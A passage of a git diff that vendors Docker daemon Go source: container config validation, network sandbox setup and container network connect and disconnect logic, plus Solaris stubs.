*containertypes.Config, update bool) ([]string, error) { + + // First perform verification of settings common across all platforms. + if config != nil { + if config.WorkingDir != "" { + config.WorkingDir = filepath.FromSlash(config.WorkingDir) // Ensure in platform semantics + if !system.IsAbs(config.WorkingDir) { + return nil, fmt.Errorf("the working directory '%s' is invalid, it needs to be an absolute path", config.WorkingDir) + } + } + + if len(config.StopSignal) > 0 { + _, err := signal.ParseSignal(config.StopSignal) + if err != nil { + return nil, err + } + } + + // Validate if Env contains empty variable or not (e.g., ``, `=foo`) + for _, env := range config.Env { + if _, err := opts.ValidateEnv(env); err != nil { + return nil, err + } + } + } + + if hostConfig == nil { + return nil, nil + } + + if hostConfig.AutoRemove && !hostConfig.RestartPolicy.IsNone() { + return nil, fmt.Errorf("can't create 'AutoRemove' container with restart policy") + } + + for port := range hostConfig.PortBindings { + _, portStr := nat.SplitProtoPort(string(port)) + if _, err := nat.ParsePort(portStr); err != nil { + return nil, fmt.Errorf("invalid port specification: %q", portStr) + } + for _, pb := range hostConfig.PortBindings[port] { + _, err := nat.NewPort(nat.SplitProtoPort(pb.HostPort)) + if err != nil { + return nil, fmt.Errorf("invalid port specification: %q", pb.HostPort) + } + } + } + + p := hostConfig.RestartPolicy + + switch p.Name { + case "always", "unless-stopped", "no": + if p.MaximumRetryCount != 0 { + return nil, fmt.Errorf("maximum retry count cannot be used with restart policy '%s'", p.Name) + } + case "on-failure": + if p.MaximumRetryCount < 0 { + return nil, fmt.Errorf("maximum retry count cannot be negative") + } + case "": + // do nothing + default: + return nil, fmt.Errorf("invalid restart policy '%s'", p.Name) + } + + // Now do platform-specific verification + return verifyPlatformContainerSettings(daemon, hostConfig, config, update) +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations.go b/vendor/github.com/docker/docker/daemon/container_operations.go new file mode 100644 index 0000000000..c30250622d --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations.go @@ -0,0 +1,1049 @@ +package daemon + +import ( + "errors" + "fmt" + "net" + "os" + "path" + "runtime" + "strings" + "time" + + "github.com/Sirupsen/logrus" + derr "github.com/docker/docker/api/errors" + containertypes "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/container" + "github.com/docker/docker/daemon/network" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/docker/runconfig" + "github.com/docker/go-connections/nat" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/netlabel" + "github.com/docker/libnetwork/options" + "github.com/docker/libnetwork/types" +) + +var ( + // ErrRootFSReadOnly is returned when a container + // rootfs is marked readonly. + ErrRootFSReadOnly = errors.New("container rootfs is marked read-only") + getPortMapInfo = container.GetSandboxPortMapInfo +) + +func (daemon *Daemon) buildSandboxOptions(container *container.Container) ([]libnetwork.SandboxOption, error) { + var ( + sboxOptions []libnetwork.SandboxOption + err error + dns []string + dnsSearch []string + dnsOptions []string + bindings = make(nat.PortMap) + pbList []types.PortBinding + exposeList []types.TransportPort + ) + + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + sboxOptions = append(sboxOptions, libnetwork.OptionHostname(container.Config.Hostname), + libnetwork.OptionDomainname(container.Config.Domainname)) + + if container.HostConfig.NetworkMode.IsHost() { + sboxOptions = append(sboxOptions, libnetwork.OptionUseDefaultSandbox()) + if len(container.HostConfig.ExtraHosts) == 0 { + sboxOptions = append(sboxOptions, libnetwork.OptionOriginHostsPath("/etc/hosts")) + } + if len(container.HostConfig.DNS) == 0 && len(daemon.configStore.DNS) == 0 && + len(container.HostConfig.DNSSearch) == 0 && len(daemon.configStore.DNSSearch) == 0 && + len(container.HostConfig.DNSOptions) == 0 && len(daemon.configStore.DNSOptions) == 0 { + sboxOptions = append(sboxOptions, libnetwork.OptionOriginResolvConfPath("/etc/resolv.conf")) + } + } else { + // OptionUseExternalKey is mandatory for userns support. + // But optional for non-userns support + sboxOptions = append(sboxOptions, libnetwork.OptionUseExternalKey()) + } + + if err = setupPathsAndSandboxOptions(container, &sboxOptions); err != nil { + return nil, err + } + + if len(container.HostConfig.DNS) > 0 { + dns = container.HostConfig.DNS + } else if len(daemon.configStore.DNS) > 0 { + dns = daemon.configStore.DNS + } + + for _, d := range dns { + sboxOptions = append(sboxOptions, libnetwork.OptionDNS(d)) + } + + if len(container.HostConfig.DNSSearch) > 0 { + dnsSearch = container.HostConfig.DNSSearch + } else if len(daemon.configStore.DNSSearch) > 0 { + dnsSearch = daemon.configStore.DNSSearch + } + + for _, ds := range dnsSearch { + sboxOptions = append(sboxOptions, libnetwork.OptionDNSSearch(ds)) + } + + if len(container.HostConfig.DNSOptions) > 0 { + dnsOptions = container.HostConfig.DNSOptions + } else if len(daemon.configStore.DNSOptions) > 0 { + dnsOptions = daemon.configStore.DNSOptions + } + + for _, ds := range dnsOptions { + sboxOptions = append(sboxOptions, libnetwork.OptionDNSOptions(ds)) + } + + if container.NetworkSettings.SecondaryIPAddresses != nil { + name := container.Config.Hostname + if container.Config.Domainname != "" { + name = name + "." + container.Config.Domainname + } + + for _, a := range container.NetworkSettings.SecondaryIPAddresses { + sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(name, a.Addr)) + } + } + + for _, extraHost := range container.HostConfig.ExtraHosts { + // allow IPv6 addresses in extra hosts; only split on first ":" + parts := strings.SplitN(extraHost, ":", 2) + sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(parts[0], parts[1])) + } + + if container.HostConfig.PortBindings != nil { + for p, b := range container.HostConfig.PortBindings { + bindings[p] = []nat.PortBinding{} + for _, bb := range b { + bindings[p] = append(bindings[p], nat.PortBinding{ + HostIP: bb.HostIP, + HostPort: bb.HostPort, + }) + } + } + } + + portSpecs := container.Config.ExposedPorts + ports := make([]nat.Port, len(portSpecs)) + var i int + for p := range portSpecs { + ports[i] = p + i++ + } + nat.SortPortMap(ports, bindings) + for _, port := range ports { + expose := types.TransportPort{} + expose.Proto = types.ParseProtocol(port.Proto()) + expose.Port = uint16(port.Int()) + exposeList = append(exposeList, expose) + + pb := types.PortBinding{Port: expose.Port, Proto: expose.Proto} + binding := bindings[port] + for i := 0; i < len(binding); i++ { + pbCopy := pb.GetCopy() + newP, err := nat.NewPort(nat.SplitProtoPort(binding[i].HostPort)) + var portStart, portEnd int + if err == nil { + portStart, portEnd, err = newP.Range() + } + if err != nil { + return nil, fmt.Errorf("Error parsing HostPort value(%s):%v", binding[i].HostPort, err) + } + pbCopy.HostPort = uint16(portStart) + pbCopy.HostPortEnd = uint16(portEnd) + pbCopy.HostIP = net.ParseIP(binding[i].HostIP) + pbList = append(pbList, pbCopy) + } + + if container.HostConfig.PublishAllPorts && len(binding) == 0 { + pbList = append(pbList, pb) + } + } + + sboxOptions = append(sboxOptions, + libnetwork.OptionPortMapping(pbList), + libnetwork.OptionExposedPorts(exposeList)) + + // Legacy Link feature is supported only for the default bridge network. + // return if this call to build join options is not for default bridge network + // Legacy Link is only supported by docker run --link + bridgeSettings, ok := container.NetworkSettings.Networks[defaultNetName] + if !ok || bridgeSettings.EndpointSettings == nil { + return sboxOptions, nil + } + + if bridgeSettings.EndpointID == "" { + return sboxOptions, nil + } + + var ( + childEndpoints, parentEndpoints []string + cEndpointID string + ) + + children := daemon.children(container) + for linkAlias, child := range children { + if !isLinkable(child) { + return nil, fmt.Errorf("Cannot link to %s, as it does not belong to the default network", child.Name) + } + _, alias := path.Split(linkAlias) + // allow access to the linked container via the alias, real name, and container hostname + aliasList := alias + " " + child.Config.Hostname + // only add the name if alias isn't equal to the name + if alias != child.Name[1:] { + aliasList = aliasList + " " + child.Name[1:] + } + sboxOptions = append(sboxOptions, libnetwork.OptionExtraHost(aliasList, child.NetworkSettings.Networks[defaultNetName].IPAddress)) + cEndpointID = child.NetworkSettings.Networks[defaultNetName].EndpointID + if cEndpointID != "" { + childEndpoints = append(childEndpoints, cEndpointID) + } + } + + for alias, parent := range daemon.parents(container) { + if daemon.configStore.DisableBridge || !container.HostConfig.NetworkMode.IsPrivate() { + continue + } + + _, alias = path.Split(alias) + logrus.Debugf("Update /etc/hosts of %s for alias %s with ip %s", parent.ID, alias, bridgeSettings.IPAddress) + sboxOptions = append(sboxOptions, libnetwork.OptionParentUpdate( + parent.ID, + alias, + bridgeSettings.IPAddress, + )) + if cEndpointID != "" { + parentEndpoints = append(parentEndpoints, cEndpointID) + } + } + + linkOptions := options.Generic{ + netlabel.GenericData: options.Generic{ + "ParentEndpoints": parentEndpoints, + "ChildEndpoints": childEndpoints, + }, + } + + sboxOptions = append(sboxOptions, libnetwork.OptionGeneric(linkOptions)) + return sboxOptions, nil +} + +func (daemon *Daemon) updateNetworkSettings(container *container.Container, n libnetwork.Network, endpointConfig *networktypes.EndpointSettings) error { + if container.NetworkSettings == nil { + container.NetworkSettings = &network.Settings{Networks: make(map[string]*network.EndpointSettings)} + } + + if !container.HostConfig.NetworkMode.IsHost() && containertypes.NetworkMode(n.Type()).IsHost() { + return runconfig.ErrConflictHostNetwork + } + + for s := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(s) + if err != nil { + continue + } + + if sn.Name() == n.Name() { + // Avoid duplicate config + return nil + } + if !containertypes.NetworkMode(sn.Type()).IsPrivate() || + !containertypes.NetworkMode(n.Type()).IsPrivate() { + return runconfig.ErrConflictSharedNetwork + } + if containertypes.NetworkMode(sn.Name()).IsNone() || + containertypes.NetworkMode(n.Name()).IsNone() { + return runconfig.ErrConflictNoNetwork + } + } + + if _, ok := container.NetworkSettings.Networks[n.Name()]; !ok { + container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, + } + } + + return nil +} + +func (daemon *Daemon) updateEndpointNetworkSettings(container *container.Container, n libnetwork.Network, ep libnetwork.Endpoint) error { + if err := container.BuildEndpointInfo(n, ep); err != nil { + return err + } + + if container.HostConfig.NetworkMode == runconfig.DefaultDaemonNetworkMode() { + container.NetworkSettings.Bridge = daemon.configStore.bridgeConfig.Iface + } + + return nil +} + +// UpdateNetwork is used to update the container's network (e.g. when linked containers +// get removed/unlinked). +func (daemon *Daemon) updateNetwork(container *container.Container) error { + var ( + start = time.Now() + ctrl = daemon.netController + sid = container.NetworkSettings.SandboxID + ) + + sb, err := ctrl.SandboxByID(sid) + if err != nil { + return fmt.Errorf("error locating sandbox id %s: %v", sid, err) + } + + // Find if container is connected to the default bridge network + var n libnetwork.Network + for name := range container.NetworkSettings.Networks { + sn, err := daemon.FindNetwork(name) + if err != nil { + continue + } + if sn.Name() == runconfig.DefaultDaemonNetworkMode().NetworkName() { + n = sn + break + } + } + + if n == nil { + // Not connected to the default bridge network; Nothing to do + return nil + } + + options, err := daemon.buildSandboxOptions(container) + if err != nil { + return fmt.Errorf("Update network failed: %v", err) + } + + if err := sb.Refresh(options...); err != nil { + return fmt.Errorf("Update network failed: Failure in refresh sandbox %s: %v", sid, err) + } + + networkActions.WithValues("update").UpdateSince(start) + + return nil +} + +func (daemon *Daemon) findAndAttachNetwork(container *container.Container, idOrName string, epConfig *networktypes.EndpointSettings) (libnetwork.Network, *networktypes.NetworkingConfig, error) { + n, err := daemon.FindNetwork(idOrName) + if err != nil { + // We should always be able to find the network for a + // managed container. + if container.Managed { + return nil, nil, err + } + } + + // If we found a network and if it is not dynamically created + // we should never attempt to attach to that network here. + if n != nil { + if container.Managed || !n.Info().Dynamic() { + return n, nil, nil + } + } + + var addresses []string + if epConfig != nil && epConfig.IPAMConfig != nil { + if epConfig.IPAMConfig.IPv4Address != "" { + addresses = append(addresses, epConfig.IPAMConfig.IPv4Address) + } + + if epConfig.IPAMConfig.IPv6Address != "" { + addresses = append(addresses, epConfig.IPAMConfig.IPv6Address) + } + } + + var ( + config *networktypes.NetworkingConfig + retryCount int + ) + + for { + // In all other cases, attempt to attach to the network to + // trigger attachment in the swarm cluster manager. + if daemon.clusterProvider != nil { + var err error + config, err = daemon.clusterProvider.AttachNetwork(idOrName, container.ID, addresses) + if err != nil { + return nil, nil, err + } + } + + n, err = daemon.FindNetwork(idOrName) + if err != nil { + if daemon.clusterProvider != nil { + if err := daemon.clusterProvider.DetachNetwork(idOrName, container.ID); err != nil { + logrus.Warnf("Could not rollback attachment for container %s to network %s: %v", container.ID, idOrName, err) + } + } + + // Retry network attach again if we failed to + // find the network after successfull + // attachment because the only reason that + // would happen is if some other container + // attached to the swarm scope network went down + // and removed the network while we were in + // the process of attaching. + if config != nil { + if _, ok := err.(libnetwork.ErrNoSuchNetwork); ok { + if retryCount >= 5 { + return nil, nil, fmt.Errorf("could not find network %s after successful attachment", idOrName) + } + retryCount++ + continue + } + } + + return nil, nil, err + } + + break + } + + // This container has attachment to a swarm scope + // network. Update the container network settings accordingly. + container.NetworkSettings.HasSwarmEndpoint = true + return n, config, nil +} + +// updateContainerNetworkSettings update the network settings +func (daemon *Daemon) updateContainerNetworkSettings(container *container.Container, endpointsConfig map[string]*networktypes.EndpointSettings) { + var n libnetwork.Network + + mode := container.HostConfig.NetworkMode + if container.Config.NetworkDisabled || mode.IsContainer() { + return + } + + networkName := mode.NetworkName() + if mode.IsDefault() { + networkName = daemon.netController.Config().Daemon.DefaultNetwork + } + + if mode.IsUserDefined() { + var err error + + n, err = daemon.FindNetwork(networkName) + if err == nil { + networkName = n.Name() + } + } + + if container.NetworkSettings == nil { + container.NetworkSettings = &network.Settings{} + } + + if len(endpointsConfig) > 0 { + if container.NetworkSettings.Networks == nil { + container.NetworkSettings.Networks = make(map[string]*network.EndpointSettings) + } + + for name, epConfig := range endpointsConfig { + container.NetworkSettings.Networks[name] = &network.EndpointSettings{ + EndpointSettings: epConfig, + } + } + } + + if container.NetworkSettings.Networks == nil { + container.NetworkSettings.Networks = make(map[string]*network.EndpointSettings) + container.NetworkSettings.Networks[networkName] = &network.EndpointSettings{ + EndpointSettings: &networktypes.EndpointSettings{}, + } + } + + // Convert any settings added by client in default name to + // engine's default network name key + if mode.IsDefault() { + if nConf, ok := container.NetworkSettings.Networks[mode.NetworkName()]; ok { + container.NetworkSettings.Networks[networkName] = nConf + delete(container.NetworkSettings.Networks, mode.NetworkName()) + } + } + + if !mode.IsUserDefined() { + return + } + // Make sure to internally store the per network endpoint config by network name + if _, ok := container.NetworkSettings.Networks[networkName]; ok { + return + } + + if n != nil { + if nwConfig, ok := container.NetworkSettings.Networks[n.ID()]; ok { + container.NetworkSettings.Networks[networkName] = nwConfig + delete(container.NetworkSettings.Networks, n.ID()) + return + } + } +} + +func (daemon *Daemon) allocateNetwork(container *container.Container) error { + start := time.Now() + controller := daemon.netController + + if daemon.netController == nil { + return nil + } + + // Cleanup any stale sandbox left over due to ungraceful daemon shutdown + if err := controller.SandboxDestroy(container.ID); err != nil { + logrus.Errorf("failed to cleanup up stale network sandbox for container %s", container.ID) + } + + updateSettings := false + if len(container.NetworkSettings.Networks) == 0 { + if container.Config.NetworkDisabled || container.HostConfig.NetworkMode.IsContainer() { + return nil + } + + daemon.updateContainerNetworkSettings(container, nil) + updateSettings = true + } + + // always connect default network first since only default + // network mode support link and we need do some setting + // on sandbox initialize for link, but the sandbox only be initialized + // on first network connecting. + defaultNetName := runconfig.DefaultDaemonNetworkMode().NetworkName() + if nConf, ok := container.NetworkSettings.Networks[defaultNetName]; ok { + cleanOperationalData(nConf) + if err := daemon.connectToNetwork(container, defaultNetName, nConf.EndpointSettings, updateSettings); err != nil { + return err + } + + } + + // the intermediate map is necessary because "connectToNetwork" modifies "container.NetworkSettings.Networks" + networks := make(map[string]*network.EndpointSettings) + for n, epConf := range container.NetworkSettings.Networks { + if n == defaultNetName { + continue + } + + networks[n] = epConf + } + + for netName, epConf := range networks { + cleanOperationalData(epConf) + if err := daemon.connectToNetwork(container, netName, epConf.EndpointSettings, updateSettings); err != nil { + return err + } + } + + if err := container.WriteHostConfig(); err != nil { + return err + } + networkActions.WithValues("allocate").UpdateSince(start) + return nil +} + +func (daemon *Daemon) getNetworkSandbox(container *container.Container) libnetwork.Sandbox { + var sb libnetwork.Sandbox + daemon.netController.WalkSandboxes(func(s libnetwork.Sandbox) bool { + if s.ContainerID() == container.ID { + sb = s + return true + } + return false + }) + return sb +} + +// hasUserDefinedIPAddress returns whether the passed endpoint configuration contains IP address configuration +func hasUserDefinedIPAddress(epConfig *networktypes.EndpointSettings) bool { + return epConfig != nil && epConfig.IPAMConfig != nil && (len(epConfig.IPAMConfig.IPv4Address) > 0 || len(epConfig.IPAMConfig.IPv6Address) > 0) +} + +// User specified ip address is acceptable only for networks with user specified subnets. +func validateNetworkingConfig(n libnetwork.Network, epConfig *networktypes.EndpointSettings) error { + if n == nil || epConfig == nil { + return nil + } + if !hasUserDefinedIPAddress(epConfig) { + return nil + } + _, _, nwIPv4Configs, nwIPv6Configs := n.Info().IpamConfig() + for _, s := range []struct { + ipConfigured bool + subnetConfigs []*libnetwork.IpamConf + }{ + { + ipConfigured: len(epConfig.IPAMConfig.IPv4Address) > 0, + subnetConfigs: nwIPv4Configs, + }, + { + ipConfigured: len(epConfig.IPAMConfig.IPv6Address) > 0, + subnetConfigs: nwIPv6Configs, + }, + } { + if s.ipConfigured { + foundSubnet := false + for _, cfg := range s.subnetConfigs { + if len(cfg.PreferredPool) > 0 { + foundSubnet = true + break + } + } + if !foundSubnet { + return runconfig.ErrUnsupportedNetworkNoSubnetAndIP + } + } + } + + return nil +} + +// cleanOperationalData resets the operational data from the passed endpoint settings +func cleanOperationalData(es *network.EndpointSettings) { + es.EndpointID = "" + es.Gateway = "" + es.IPAddress = "" + es.IPPrefixLen = 0 + es.IPv6Gateway = "" + es.GlobalIPv6Address = "" + es.GlobalIPv6PrefixLen = 0 + es.MacAddress = "" + if es.IPAMOperational { + es.IPAMConfig = nil + } +} + +func (daemon *Daemon) updateNetworkConfig(container *container.Container, n libnetwork.Network, endpointConfig *networktypes.EndpointSettings, updateSettings bool) error { + + if !containertypes.NetworkMode(n.Name()).IsUserDefined() { + if hasUserDefinedIPAddress(endpointConfig) && !enableIPOnPredefinedNetwork() { + return runconfig.ErrUnsupportedNetworkAndIP + } + if endpointConfig != nil && len(endpointConfig.Aliases) > 0 && !container.EnableServiceDiscoveryOnDefaultNetwork() { + return runconfig.ErrUnsupportedNetworkAndAlias + } + } else { + addShortID := true + shortID := stringid.TruncateID(container.ID) + for _, alias := range endpointConfig.Aliases { + if alias == shortID { + addShortID = false + break + } + } + if addShortID { + endpointConfig.Aliases = append(endpointConfig.Aliases, shortID) + } + } + + if err := validateNetworkingConfig(n, endpointConfig); err != nil { + return err + } + + if updateSettings { + if err := daemon.updateNetworkSettings(container, n, endpointConfig); err != nil { + return err + } + } + return nil +} + +func (daemon *Daemon) connectToNetwork(container *container.Container, idOrName string, endpointConfig *networktypes.EndpointSettings, updateSettings bool) (err error) { + start := time.Now() + if container.HostConfig.NetworkMode.IsContainer() { + return runconfig.ErrConflictSharedNetwork + } + if containertypes.NetworkMode(idOrName).IsBridge() && + daemon.configStore.DisableBridge { + container.Config.NetworkDisabled = true + return nil + } + if endpointConfig == nil { + endpointConfig = &networktypes.EndpointSettings{} + } + + n, config, err := daemon.findAndAttachNetwork(container, idOrName, endpointConfig) + if err != nil { + return err + } + if n == nil { + return nil + } + + var operIPAM bool + if config != nil { + if epConfig, ok := config.EndpointsConfig[n.Name()]; ok { + if endpointConfig.IPAMConfig == nil || + (endpointConfig.IPAMConfig.IPv4Address == "" && + endpointConfig.IPAMConfig.IPv6Address == "" && + len(endpointConfig.IPAMConfig.LinkLocalIPs) == 0) { + operIPAM = true + } + + // copy IPAMConfig and NetworkID from epConfig via AttachNetwork + endpointConfig.IPAMConfig = epConfig.IPAMConfig + endpointConfig.NetworkID = epConfig.NetworkID + } + } + + err = daemon.updateNetworkConfig(container, n, endpointConfig, updateSettings) + if err != nil { + return err + } + + controller := daemon.netController + sb := daemon.getNetworkSandbox(container) + createOptions, err := container.BuildCreateEndpointOptions(n, endpointConfig, sb, daemon.configStore.DNS) + if err != nil { + return err + } + + endpointName := strings.TrimPrefix(container.Name, "/") + ep, err := n.CreateEndpoint(endpointName, createOptions...) + if err != nil { + return err + } + defer func() { + if err != nil { + if e := ep.Delete(false); e != nil { + logrus.Warnf("Could not rollback container connection to network %s", idOrName) + } + } + }() + container.NetworkSettings.Networks[n.Name()] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, + IPAMOperational: operIPAM, + } + if _, ok := container.NetworkSettings.Networks[n.ID()]; ok { + delete(container.NetworkSettings.Networks, n.ID()) + } + + if err := daemon.updateEndpointNetworkSettings(container, n, ep); err != nil { + return err + } + + if sb == nil { + options, err := daemon.buildSandboxOptions(container) + if err != nil { + return err + } + sb, err = controller.NewSandbox(container.ID, options...) + if err != nil { + return err + } + + container.UpdateSandboxNetworkSettings(sb) + } + + joinOptions, err := container.BuildJoinOptions(n) + if err != nil { + return err + } + + if err := ep.Join(sb, joinOptions...); err != nil { + return err + } + + if !container.Managed { + // add container name/alias to DNS + if err := daemon.ActivateContainerServiceBinding(container.Name); err != nil { + return fmt.Errorf("Activate container service binding for %s failed: %v", container.Name, err) + } + } + + if err := container.UpdateJoinInfo(n, ep); err != nil { + return fmt.Errorf("Updating join info failed: %v", err) + } + + container.NetworkSettings.Ports = getPortMapInfo(sb) + + daemon.LogNetworkEventWithAttributes(n, "connect", map[string]string{"container": container.ID}) + networkActions.WithValues("connect").UpdateSince(start) + return nil +} + +// ForceEndpointDelete deletes an endpoint from a network forcefully +func (daemon *Daemon) ForceEndpointDelete(name string, networkName string) error { + n, err := daemon.FindNetwork(networkName) + if err != nil { + return err + } + + ep, err := n.EndpointByName(name) + if err != nil { + return err + } + return ep.Delete(true) +} + +func (daemon *Daemon) disconnectFromNetwork(container *container.Container, n libnetwork.Network, force bool) error { + var ( + ep libnetwork.Endpoint + sbox libnetwork.Sandbox + ) + + s := func(current libnetwork.Endpoint) bool { + epInfo := current.Info() + if epInfo == nil { + return false + } + if sb := epInfo.Sandbox(); sb != nil { + if sb.ContainerID() == container.ID { + ep = current + sbox = sb + return true + } + } + return false + } + n.WalkEndpoints(s) + + if ep == nil && force { + epName := strings.TrimPrefix(container.Name, "/") + ep, err := n.EndpointByName(epName) + if err != nil { + return err + } + return ep.Delete(force) + } + + if ep == nil { + return fmt.Errorf("container %s is not connected to the network", container.ID) + } + + if err := ep.Leave(sbox); err != nil { + return fmt.Errorf("container %s failed to leave network %s: %v", container.ID, n.Name(), err) + } + + container.NetworkSettings.Ports = getPortMapInfo(sbox) + + if err := ep.Delete(false); err != nil { + return fmt.Errorf("endpoint delete failed for container %s on network %s: %v", container.ID, n.Name(), err) + } + + delete(container.NetworkSettings.Networks, n.Name()) + + if daemon.clusterProvider != nil && n.Info().Dynamic() && !container.Managed { + if err := daemon.clusterProvider.DetachNetwork(n.Name(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", n.Name(), err) + if err := daemon.clusterProvider.DetachNetwork(n.ID(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", n.ID(), err) + } + } + } + + return nil +} + +func (daemon *Daemon) initializeNetworking(container *container.Container) error { + var err error + + if container.HostConfig.NetworkMode.IsContainer() { + // we need to get the hosts files from the container to join + nc, err := daemon.getNetworkedContainer(container.ID, container.HostConfig.NetworkMode.ConnectedContainer()) + if err != nil { + return err + } + initializeNetworkingPaths(container, nc) + container.Config.Hostname = nc.Config.Hostname + container.Config.Domainname = nc.Config.Domainname + return nil + } + + if container.HostConfig.NetworkMode.IsHost() { + if container.Config.Hostname == "" { + container.Config.Hostname, err = os.Hostname() + if err != nil { + return err + } + } + } + + if err := daemon.allocateNetwork(container); err != nil { + return err + } + + return container.BuildHostnameFile() +} + +func (daemon *Daemon) getNetworkedContainer(containerID, connectedContainerID string) (*container.Container, error) { + nc, err := daemon.GetContainer(connectedContainerID) + if err != nil { + return nil, err + } + if containerID == nc.ID { + return nil, fmt.Errorf("cannot join own network") + } + if !nc.IsRunning() { + err := fmt.Errorf("cannot join network of a non running container: %s", connectedContainerID) + return nil, derr.NewRequestConflictError(err) + } + if nc.IsRestarting() { + return nil, errContainerIsRestarting(connectedContainerID) + } + return nc, nil +} + +func (daemon *Daemon) releaseNetwork(container *container.Container) { + start := time.Now() + if daemon.netController == nil { + return + } + if container.HostConfig.NetworkMode.IsContainer() || container.Config.NetworkDisabled { + return + } + + sid := container.NetworkSettings.SandboxID + settings := container.NetworkSettings.Networks + container.NetworkSettings.Ports = nil + + if sid == "" || len(settings) == 0 { + return + } + + var networks []libnetwork.Network + for n, epSettings := range settings { + if nw, err := daemon.FindNetwork(n); err == nil { + networks = append(networks, nw) + } + + if epSettings.EndpointSettings == nil { + continue + } + + cleanOperationalData(epSettings) + } + + sb, err := daemon.netController.SandboxByID(sid) + if err != nil { + logrus.Warnf("error locating sandbox id %s: %v", sid, err) + return + } + + if err := sb.Delete(); err != nil { + logrus.Errorf("Error deleting sandbox id %s for container %s: %v", sid, container.ID, err) + } + + for _, nw := range networks { + if daemon.clusterProvider != nil && nw.Info().Dynamic() && !container.Managed { + if err := daemon.clusterProvider.DetachNetwork(nw.Name(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", nw.Name(), err) + if err := daemon.clusterProvider.DetachNetwork(nw.ID(), container.ID); err != nil { + logrus.Warnf("error detaching from network %s: %v", nw.ID(), err) + } + } + } + + attributes := map[string]string{ + "container": container.ID, + } + daemon.LogNetworkEventWithAttributes(nw, "disconnect", attributes) + } + networkActions.WithValues("release").UpdateSince(start) +} + +func errRemovalContainer(containerID string) error { + return fmt.Errorf("Container %s is marked for removal and cannot be connected or disconnected to the network", containerID) +} + +// ConnectToNetwork connects a container to a network +func (daemon *Daemon) ConnectToNetwork(container *container.Container, idOrName string, endpointConfig *networktypes.EndpointSettings) error { + if endpointConfig == nil { + endpointConfig = &networktypes.EndpointSettings{} + } + if !container.Running { + if container.RemovalInProgress || container.Dead { + return errRemovalContainer(container.ID) + } + + n, err := daemon.FindNetwork(idOrName) + if err == nil && n != nil { + if err := daemon.updateNetworkConfig(container, n, endpointConfig, true); err != nil { + return err + } + } else { + container.NetworkSettings.Networks[idOrName] = &network.EndpointSettings{ + EndpointSettings: endpointConfig, + } + } + } else if !daemon.isNetworkHotPluggable() { + return fmt.Errorf(runtime.GOOS + " does not support connecting a running container to a network") + } else { + if err := daemon.connectToNetwork(container, idOrName, endpointConfig, true); err != nil { + return err + } + } + if err := container.ToDiskLocking(); err != nil { + return fmt.Errorf("Error saving container to disk: %v", err) + } + return nil +} + +// DisconnectFromNetwork disconnects container from network n. +func (daemon *Daemon) DisconnectFromNetwork(container *container.Container, networkName string, force bool) error { + n, err := daemon.FindNetwork(networkName) + if !container.Running || (err != nil && force) { + if container.RemovalInProgress || container.Dead { + return errRemovalContainer(container.ID) + } + // In case networkName is resolved we will use n.Name() + // this will cover the case where network id is passed. + if n != nil { + networkName = n.Name() + } + if _, ok := container.NetworkSettings.Networks[networkName]; !ok { + return fmt.Errorf("container %s is not connected to the network %s", container.ID, networkName) + } + delete(container.NetworkSettings.Networks, networkName) + } else if err == nil && !daemon.isNetworkHotPluggable() { + return fmt.Errorf(runtime.GOOS + " does not support connecting a running container to a network") + } else if err == nil { + if container.HostConfig.NetworkMode.IsHost() && containertypes.NetworkMode(n.Type()).IsHost() { + return runconfig.ErrConflictHostNetwork + } + + if err := daemon.disconnectFromNetwork(container, n, false); err != nil { + return err + } + } else { + return err + } + + if err := container.ToDiskLocking(); err != nil { + return fmt.Errorf("Error saving container to disk: %v", err) + } + + if n != nil { + attributes := map[string]string{ + "container": container.ID, + } + daemon.LogNetworkEventWithAttributes(n, "disconnect", attributes) + } + return nil +} + +// ActivateContainerServiceBinding puts this container into load balancer active rotation and DNS response +func (daemon *Daemon) ActivateContainerServiceBinding(containerName string) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + sb := daemon.getNetworkSandbox(container) + if sb == nil { + return fmt.Errorf("network sandbox does not exist for container %s", containerName) + } + return sb.EnableService() +} + +// DeactivateContainerServiceBinding remove this container fromload balancer active rotation, and DNS response +func (daemon *Daemon) DeactivateContainerServiceBinding(containerName string) error { + container, err := daemon.GetContainer(containerName) + if err != nil { + return err + } + sb := daemon.getNetworkSandbox(container) + if sb == nil { + return fmt.Errorf("network sandbox does not exist for container %s", containerName) + } + return sb.DisableService() +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_solaris.go b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go new file mode 100644 index 0000000000..1653948de1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations_solaris.go @@ -0,0 +1,46 @@ +// +build solaris + +package daemon + +import ( + "github.com/docker/docker/container" + "github.com/docker/docker/runconfig" + "github.com/docker/libnetwork" +) + +func (daemon *Daemon) setupLinkedContainers(container *container.Container) ([]string, error) { + return nil, nil +} + +func (daemon *Daemon) setupIpcDirs(container *container.Container) error { + return nil +} + +func killProcessDirectly(container *container.Container) error { + return nil +} + +func detachMounted(path string) error { + return nil +} + +func isLinkable(child *container.Container) bool { + // A container is linkable only if it belongs to the default network + _, ok := child.NetworkSettings.Networks[runconfig.DefaultDaemonNetworkMode().NetworkName()] + return ok +} + +func enableIPOnPredefinedNetwork() bool { + return false +} + +func (daemon *Daemon) isNetworkHotPluggable() bool { + return false +} + +func setupPathsAndSandboxOptions(container *container.Container, sboxOptions *[]libnetwork.SandboxOption) error { + return nil +} + +func initializeNetworkingPaths(container *container.Container, nc *container.Container) { +} diff --git a/vendor/github.com/docker/docker/daemon/container_operations_unix.go b/vendor/github.com/docker/docker/daemon/container_operations_unix.go new file mode 100644 index 0000000000..2296045765 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/container_operations_unix.go @@ -0,0 +1,281 @@ +// +build linux freebsd + 